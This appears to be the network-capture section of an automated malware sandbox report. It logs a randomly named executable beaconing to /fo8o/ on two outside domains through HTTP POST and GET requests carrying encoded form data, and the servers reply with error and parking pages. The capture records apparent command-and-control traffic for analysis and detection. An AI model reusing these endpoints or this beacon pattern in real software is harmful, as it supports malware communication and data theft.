                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                                                                                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                11192.168.2.54998991.195.240.94803440C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 24, 2024 08:25:43.675380945 CET1818OUTPOST /fo8o/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                Accept-Language: en-US,en
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.rssnewscast.com
                                                                                Origin: http://www.rssnewscast.com
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 1240
                                                                                Referer: http://www.rssnewscast.com/fo8o/
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                Data Raw: 55 7a 47 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 58 65 45 4f 71 53 73 50 41 43 72 56 78 6e 41 41 72 4b 54 56 6e 45 52 72 65 35 69 48 47 4d 6f 51 38 34 2b 48 61 69 70 6c 4d 4c 58 79 74 2f 68 6d 4a 6e 52 46 69 39 48 2f 66 57 43 56 30 66 4a 76 73 52 44 4c 78 36 6c 48 31 70 30 7a 6c 58 36 4e 4d 6c 71 33 38 42 45 49 57 58 46 6c 41 6c 58 30 4c 32 34 66 73 68 73 4b 78 56 6c 4a 66 58 39 41 41 2b 4d 49 55 68 5a 39 53 6f 39 49 54 7a 44 54 61 58 6b 6c 31 34 71 4b 76 6b 45 6c 34 4b 4c 48 73 35 75 52 67 64 73 35 55 4d 34 75 38 69 59 42 31 64 62 75 6d 7a 4c 67 61 41 33 54 2f 58 6f 6d 65 44 6d 76 4b 79 68 45 33 61 76 52 31 66 53 45 79 67 58 6e 59 6b 47 6d 6c 67 4e 56 51 65 68 4f 31 36 35 63 4f 37 32 6c 69 68 4e 46 4c 78 6b 59 43 6a 56 6b 52 78 4d 79 6c 4c 70 48 69 2f 7a 71 65 4a 48 49 31 64 75 30 31 42 36 61 46 56 45 43 2b 47 4b 39 57 4a 55 36 67 59 4a 55 50 65 63 43 6a 7a 4b 39 73 77 44 57 61 79 62 38 5a 6d 48 5a 65 4a 2f 34 4f 53 53 44 72 58 4f 71 52 44 79 73 57 66 4e 33 69 72 64 62 46 68 52 78 48 61 73 64 47 4a [TRUNCATED]
                                                                                Data Ascii: UzG=81L18xe3ynKwXeEOqSsPACrVxnAArKTVnERre5iHGMoQ84+HaiplMLXyt/hmJnRFi9H/fWCV0fJvsRDLx6lH1p0zlX6NMlq38BEIWXFlAlX0L24fshsKxVlJfX9AA+MIUhZ9So9ITzDTaXkl14qKvkEl4KLHs5uRgds5UM4u8iYB1dbumzLgaA3T/XomeDmvKyhE3avR1fSEygXnYkGmlgNVQehO165cO72lihNFLxkYCjVkRxMylLpHi/zqeJHI1du01B6aFVEC+GK9WJU6gYJUPecCjzK9swDWayb8ZmHZeJ/4OSSDrXOqRDysWfN3irdbFhRxHasdGJ8fHmgRUQ7q75bPSfk5DUYG9UBoGdi8/mF/xbb5iSBE5JY12dA9aYXe5DGaUCD9a4C2fei4rNKdB9+BuOOEs4LKirthC28h2UyW7au3cW4PlACw9lABunaNscL+QtWzR0nRbjK8h1wMNNZK1kvO/iZcESC7N+cDrmgluCEHjfQXc0V2cvBN6bVduPb1dXYDe5/WGT/pCef4uOWdjBYB3f2EIBwROeAD75Mkn4n9Gbm9RO9xHMSnAUWNtBfPdhdkU+HNFMIly/4KFW2Y3PE1IR2k1a68+R8/BBBBOIwVSCGCeSfnbUZzQBeUWLBT22wRNNq+pkmWyRUDpFvf2jyfm3jS5K5KbFyo+Q/N6MUOpbO4V9IW5yGU9dOvkF68jtOUwQnVuE34QDrlXP9Q7Q8RIajk+fsL6l23HbWMc5Rs6ZOhHPv/oN0K9yBpnczxPQwb/nUR7UgEKZD1DjVw/Itpwyrh2mukh9gARKuIkh6Dw0GhJs5mUjJZ5ykBfSPKYkHSaDVs8H6iFEa0XmrFHU8AZOyE6oSxQ5c7MfQUmgtQ950qfdhIgaLeofjVX6RZdPen2hXitfVv/8m4jR37t0NuhY5JWHwSC2h6mRHsY/Wrxf1b0F8wpfgYsZD2q/QAl3ByJjp3n6dvdP3bj+k0a9v6QyqIR5IJSPY60M8i [TRUNCATED]
                                                                                Dec 24, 2024 08:25:44.950000048 CET707INHTTP/1.1 405 Not Allowed
                                                                                date: Tue, 24 Dec 2024 07:25:44 GMT
                                                                                content-type: text/html
                                                                                content-length: 556
                                                                                server: Parking/1.0
                                                                                connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                                                                                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                12192.168.2.54999091.195.240.94803440C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 24, 2024 08:25:46.341620922 CET515OUTGET /fo8o/?UzG=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNo7YSnSe3b06z1hRjejs3ag7OBngOhxFR5lEHJntjOPFYJw==&SFst=D27DuB HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                Accept-Language: en-US,en
                                                                                Host: www.rssnewscast.com
                                                                                Connection: close
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                Dec 24, 2024 08:25:47.641958952 CET1236INHTTP/1.1 200 OK
                                                                                date: Tue, 24 Dec 2024 07:25:47 GMT
                                                                                content-type: text/html; charset=UTF-8
                                                                                transfer-encoding: chunked
                                                                                vary: Accept-Encoding
                                                                                expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                pragma: no-cache
                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_TqSfMrTQVCK61EY026Aqob4F0amjox1hnEZBFLD7NLJKdmvImdt91GLXbPD3dONQ13reikpv3kyPLnkLBV/x4g==
                                                                                last-modified: Tue, 24 Dec 2024 07:25:47 GMT
                                                                                x-cache-miss-from: parking-7df97dc48-8ltqc
                                                                                server: Parking/1.0
                                                                                connection: close
                                                                                Data Raw: 32 45 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 54 71 53 66 4d 72 54 51 56 43 4b 36 31 45 59 30 32 36 41 71 6f 62 34 46 30 61 6d 6a 6f 78 31 68 6e 45 5a 42 46 4c 44 37 4e 4c 4a 4b 64 6d 76 49 6d 64 74 39 31 47 4c 58 62 50 44 33 64 4f 4e 51 31 33 72 65 69 6b 70 76 33 6b 79 50 4c 6e 6b 4c 42 56 2f 78 34 67 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 72 73 73 6e 65 77 73 63 61 73 74 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 72 73 73 6e [TRUNCATED]
                                                                                Data Ascii: 2E3<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_TqSfMrTQVCK61EY026Aqob4F0amjox1hnEZBFLD7NLJKdmvImdt91GLXbPD3dONQ13reikpv3kyPLnkLBV/x4g==><head><meta charset="utf-8"><title>rssnewscast.com&nbsp;-&nbsp;rssnewscast Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="rssnewscast.com is your first and best source for all of the informatio
                                                                                Dec 24, 2024 08:25:47.641988993 CET1236INData Raw: 6e 20 79 6f 75 e2 80 99 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 20 46 72 6f 6d 20 67 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d 6f 72 65 20 6f 66 20 77 68 61 74 20 79 6f 75 20 77 6f 75 6c 64 20 65 78 70 65 63 74 20 74 6f 20 66 69
                                                                                Data Ascii: n youre looking for. From general topics to more of what you would expect to find here, rssnewscast.com has it all. We hope you find what you are searchiAECng for!"><link rel="icon" type="image/png" href="//img.s
                                                                                Dec 24, 2024 08:25:47.642004967 CET1236INData Raw: 65 2d 68 65 69 67 68 74 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 7d 73 75 62 7b 62 6f 74 74 6f 6d 3a 2d 30 2e 32 35 65 6d 7d 73 75 70 7b 74 6f 70 3a 2d 30
                                                                                Data Ascii: e-height:0;position:relative;vertical-align:baseline}sub{bottom:-0.25em}sup{top:-0.5em}audio,video{display:inline-block}audio:not([controls]){display:none;height:0}img{border-style:none}svg:not(:root){overflow:hidden}button,input,optgroup,sele
                                                                                Dec 24, 2024 08:25:47.642147064 CET1236INData Raw: 5d 3a 3a 2d 77 65 62 6b 69 74 2d 73 65 61 72 63 68 2d 64 65 63 6f 72 61 74 69 6f 6e 7b 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 6e 6f 6e 65 7d 3a 3a 2d 77 65 62 6b 69 74 2d 66 69 6c 65 2d 75 70 6c 6f 61 64 2d 62 75 74 74 6f 6e 7b
                                                                                Data Ascii: ]::-webkit-search-decoration{-webkit-appearance:none}::-webkit-file-upload-button{-webkit-appearance:button;font:inherit}details,menu{display:block}summary{display:list-item}canvas{display:inline-block}template{display:none}[hidden]{display:no
                                                                                Dec 24, 2024 08:25:47.642163992 CET896INData Raw: 3a 39 30 25 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 38 32 30 70 78 7d 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 7b 70 61 64 64 69 6e 67 3a 30 20 30 20 31 2e 36 65 6d 20 30 7d 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 5f 5f 6c
                                                                                Data Ascii: :90%;min-height:820px}.two-tier-ads-list{padding:0 0 1.6em 0}.two-tier-ads-list__list-element{list-style:none;padding:10px 0 5px 0;display:inline-block}.two-tier-ads-list__list-element-image{content:url("//img.sedoparking.com/templates/images/
                                                                                Dec 24, 2024 08:25:47.642180920 CET1236INData Raw: 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 6c 69 6e 6b 3a 66 6f 63 75 73 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 2e 77 65 62 61 72 63 68 69 76 65 2d 62 6c 6f 63 6b 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 77
                                                                                Data Ascii: ist-element-link:focus{text-decoration:none}.webarchive-block{text-align:center}.webarchive-block__header-link{color:#0a48ff;font-size:20px}.webarchive-block__list{padding:0}.webarchive-block__list-element{word-wrap:break-word;list-style:none}
                                                                                Dec 24, 2024 08:25:47.642199993 CET1236INData Raw: 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 31 35 70 78 3b 62 6f 72 64 65 72 3a 30 20 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 32 70 78 20 38 70 78 3b 63 6f 6c 6f 72 3a 23 36 33 38 32 39 36 7d 2e 63 6f
                                                                                Data Ascii: er;font-size:12px;margin-left:15px;border:0 none;padding:2px 8px;color:#638296}.container-disclaimer{text-align:center}.container-disclaimer__content{display:inline-block}.container-disclaimer__content-text,.container-disclaimer a{font-size:10
                                                                                Dec 24, 2024 08:25:47.642216921 CET556INData Raw: 6e 74 65 6e 74 2d 69 6e 74 65 72 61 63 74 69 76 65 2d 68 65 61 64 65 72 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6f 6b 69 65 2d 6d 65 73 73 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 69 6e 74 65 72 61 63 74 69 76 65 2d 74 65 78 74 7b 63 6f 6c 6f 72
                                                                                Data Ascii: ntent-interactive-header,.container-cookie-message__content-interactive-text{color:#fff}.container-cookie-message__content-interactive-header{font-size:small}.container-cookie-message__content-interactive-text{margin-top:10px;margin-right:0px;
                                                                                Dec 24, 2024 08:25:47.642435074 CET1236INData Raw: 31 30 35 43 0d 0a 74 2d 68 65 61 64 65 72 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 35 70 78 7d 2e 63 6f 6f 6b 69 65 2d 6d 6f 64 61 6c 2d 77 69 6e 64 6f 77 5f 5f 63 6f 6e 74 65 6e 74 7b 74 65 78 74 2d 61
                                                                                Data Ascii: 105Ct-header{font-size:150%;margin:0 0 15px}.cookie-modal-window__content{text-align:initial;margin:10% auto;padding:40px;background:#fff;display:inline-block;max-width:550px}.cookie-modal-window__content-text{line-height:1.5em}.cookie-modal
                                                                                Dec 24, 2024 08:25:47.642451048 CET1236INData Raw: 6e 74 2d 73 69 7a 65 3a 6d 65 64 69 75 6d 7d 2e 62 74 6e 2d 2d 73 65 63 6f 6e 64 61 72 79 2d 73 6d 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 38 63 39 35 39 63 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 38 63 39 35 39 63 3b 63 6f
                                                                                Data Ascii: nt-size:medium}.btn--secondary-sm{background-color:#8c959c;border-color:#8c959c;color:#fff;font-size:initial}.btn--secondary-sm:hover{background-color:#727c83;border-color:#727c83;color:#fff;font-size:initial}.switch input{opacity:0;width:0;he
                                                                                Dec 24, 2024 08:25:47.761827946 CET1236INData Raw: 3d 20 7b 22 75 69 4f 70 74 69 6d 69 7a 65 22 3a 66 61 6c 73 65 2c 22 73 69 6e 67 6c 65 44 6f 6d 61 69 6e 4e 61 6d 65 22 3a 22 72 73 73 6e 65 77 73 63 61 73 74 2e 63 6f 6d 22 2c 22 64 6f 6d 61 69 6e 4e 61 6d 65 22 3a 22 72 73 73 6e 65 77 73 63 61
                                                                                Data Ascii: = {"uiOptimize":false,"singleDomainName":"rssnewscast.com","domainName":"rssnewscast.com","domainPrice":0,"domainCurrency":"","adultFlag":false,"pu":"//www.rssnewscast.com","dnsh":true,"dpsh":false,"toSell":false,"cdnHost":"img.sedoparking.com


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                13192.168.2.54999166.29.149.46803440C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 24, 2024 08:26:02.012259007 CET781OUTPOST /fo8o/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                Accept-Language: en-US,en
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.techchains.info
                                                                                Origin: http://www.techchains.info
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 204
                                                                                Referer: http://www.techchains.info/fo8o/
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                Data Raw: 55 7a 47 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 69 4b 34 53 32 61 69 74 78 50 39 4f 6d 54 4b 35 74 56 57 73 56 31 47 52 6c 4a 39 49 61 6d 38 33 56 6a 67 62 4a 4d 45 61 58 49 75 67 57 4b 44 6e 31 5a 75 6e 47 7a 61 38 30 79 2f 6d 47 74 35 53 62 46 57 72 42 75 6f 42 61 4c 6b 37 39 6e 58 66 51 47 46 56 58 56 61 4f 4b 35 6a 51 69 4e 69 69 48 67 48 6e 6e 74 59 34 54 70 69 69 50 6d 36 33 54 41 68 66 59 65 31 7a 4a 74 6f 54 74 50 45 67 4d 38 61 71 62 56 6d 58 58 35 42 66 54 31 51 77 35 7a 65 58 49 64 72 2b 59 53 49 49 64 68 49 53 61 68 49 73 7a 47 4e 63 69 31 4e 6f 76 79 34 6b 6d 62 53 73 59 6e 36 30 39 74 77 3d
                                                                                Data Ascii: UzG=ic393dm3l8hWiK4S2aitxP9OmTK5tVWsV1GRlJ9Iam83VjgbJMEaXIugWKDn1ZunGza80y/mGt5SbFWrBuoBaLk79nXfQGFVXVaOK5jQiNiiHgHnntY4TpiiPm63TAhfYe1zJtoTtPEgM8aqbVmXX5BfT1Qw5zeXIdr+YSIIdhISahIszGNci1Novy4kmbSsYn609tw=
                                                                                Dec 24, 2024 08:26:03.241569996 CET637INHTTP/1.1 404 Not Found
                                                                                Date: Tue, 24 Dec 2024 07:26:03 GMT
                                                                                Server: Apache
                                                                                Content-Length: 493
                                                                                Connection: close
                                                                                Content-Type: text/html
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                                Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                14192.168.2.54999266.29.149.46803440C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 24, 2024 08:26:04.669610977 CET801OUTPOST /fo8o/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                Accept-Language: en-US,en
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.techchains.info
                                                                                Origin: http://www.techchains.info
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 224
                                                                                Referer: http://www.techchains.info/fo8o/
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                Data Raw: 55 7a 47 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 6a 71 6f 53 77 35 36 74 33 76 38 38 73 7a 4b 35 69 31 58 6c 56 31 4b 52 6c 4e 6c 59 64 56 49 33 56 43 77 62 4b 4e 45 61 55 49 75 67 59 71 44 6d 37 35 75 34 47 7a 57 4f 30 77 37 6d 47 70 52 53 62 41 79 72 43 5a 38 47 41 37 6b 39 37 6e 58 42 65 6d 46 56 58 56 61 4f 4b 35 47 48 69 4a 4f 69 48 77 58 6e 6d 4a 45 2f 65 4a 69 68 5a 32 36 33 58 41 67 55 59 65 31 46 4a 73 30 39 74 4e 4d 67 4d 38 71 71 62 42 36 51 64 35 42 5a 63 56 52 67 35 78 6a 64 50 72 6e 38 53 53 35 50 4e 67 6f 57 53 33 6c 47 70 6b 46 30 78 56 68 51 2f 68 77 54 33 72 7a 46 43 45 71 45 6a 36 6c 52 4e 63 71 31 55 39 69 56 32 62 32 58 2f 52 73 2b 46 6d 46 4e
                                                                                Data Ascii: UzG=ic393dm3l8hWjqoSw56t3v88szK5i1XlV1KRlNlYdVI3VCwbKNEaUIugYqDm75u4GzWO0w7mGpRSbAyrCZ8GA7k97nXBemFVXVaOK5GHiJOiHwXnmJE/eJihZ263XAgUYe1FJs09tNMgM8qqbB6Qd5BZcVRg5xjdPrn8SS5PNgoWS3lGpkF0xVhQ/hwT3rzFCEqEj6lRNcq1U9iV2b2X/Rs+FmFN
                                                                                Dec 24, 2024 08:26:05.911892891 CET637INHTTP/1.1 404 Not Found
                                                                                Date: Tue, 24 Dec 2024 07:26:05 GMT
                                                                                Server: Apache
                                                                                Content-Length: 493
                                                                                Connection: close
                                                                                Content-Type: text/html
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
